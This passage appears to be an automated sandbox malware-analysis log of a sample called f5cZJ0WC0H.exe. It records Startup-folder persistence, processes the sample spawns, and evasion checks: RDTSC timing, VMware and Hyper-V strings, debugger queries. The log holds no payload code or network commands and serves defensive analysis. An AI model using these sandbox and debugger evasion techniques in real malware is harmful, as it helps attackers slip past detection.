          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe    RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: +0x00 rdtsc; +0x02 xor ecx, ecx; +0x04 add ecx, eax; +0x06 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe    RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: +0x00 rdtsc; +0x02 xor ecx, ecx; +0x04 add ecx, eax; +0x06 rdtsc
          Source: C:\Windows\SysWOW64\help.exe    RDTSC instruction interceptor: First address: 00000000005098E4 second address: 00000000005098EA instructions: +0x00 rdtsc; +0x02 xor ecx, ecx; +0x04 add ecx, eax; +0x06 rdtsc
          Source: C:\Windows\SysWOW64\help.exe    RDTSC instruction interceptor: First address: 0000000000509B4E second address: 0000000000509B54 instructions: +0x00 rdtsc; +0x02 xor ecx, ecx; +0x04 add ecx, eax; +0x06 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe    RDTSC instruction interceptor: First address: 00000000004C98E4 second address: 00000000004C98EA instructions: +0x00 rdtsc; +0x02 xor ecx, ecx; +0x04 add ecx, eax; +0x06 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe    RDTSC instruction interceptor: First address: 00000000004C9B4E second address: 00000000004C9B54 instructions: +0x00 rdtsc; +0x02 xor ecx, ecx; +0x04 add ecx, eax; +0x06 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe    Code function: 21_2_00409A80 rdtsc 21_2_00409A80
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Thread delayed: delay time: 922337203685477 (2 identical entries)
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe    Thread delayed: delay time: 922337203685477 (2 identical entries)
          Source: C:\Windows\SysWOW64\wscript.exe    Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 2538
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 1867
          Source: C:\Windows\SysWOW64\timeout.exe TID: 5992    Thread sleep count: 42 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2968    Thread sleep count: 2538 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6108    Thread sleep count: 1867 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6176    Thread sleep count: 48 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7016    Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180    Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe TID: 5492    Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe TID: 6504    Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5312Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe:Zone.IdentifierJump to behavior
          Source: powershell.exe, 00000005.00000002.348181371.0000000005AE4000.00000004.00000001.sdmp Binary or memory string: Hyper-V
          Source: explorer.exe, 00000016.00000000.370431317.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000016.00000000.370673223.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000016.00000002.502838967.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000016.00000000.394362112.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000016.00000000.381954459.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000016.00000000.394362112.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe Process queried: DebugFlags
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe Process queried: DebugObjectHandle
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Process queried: DebugFlags
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Process queried: DebugObjectHandle
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Process queried: DebugFlags
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Process queried: DebugObjectHandle
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_00409A80 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0040ACC0 LdrLoadDll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01134120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0113B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0113B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01142990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0113C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01197016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01197016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01197016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01130050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01130050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01193884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01193884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111DB40 mov eax, dword ptr fs:[00000030h]
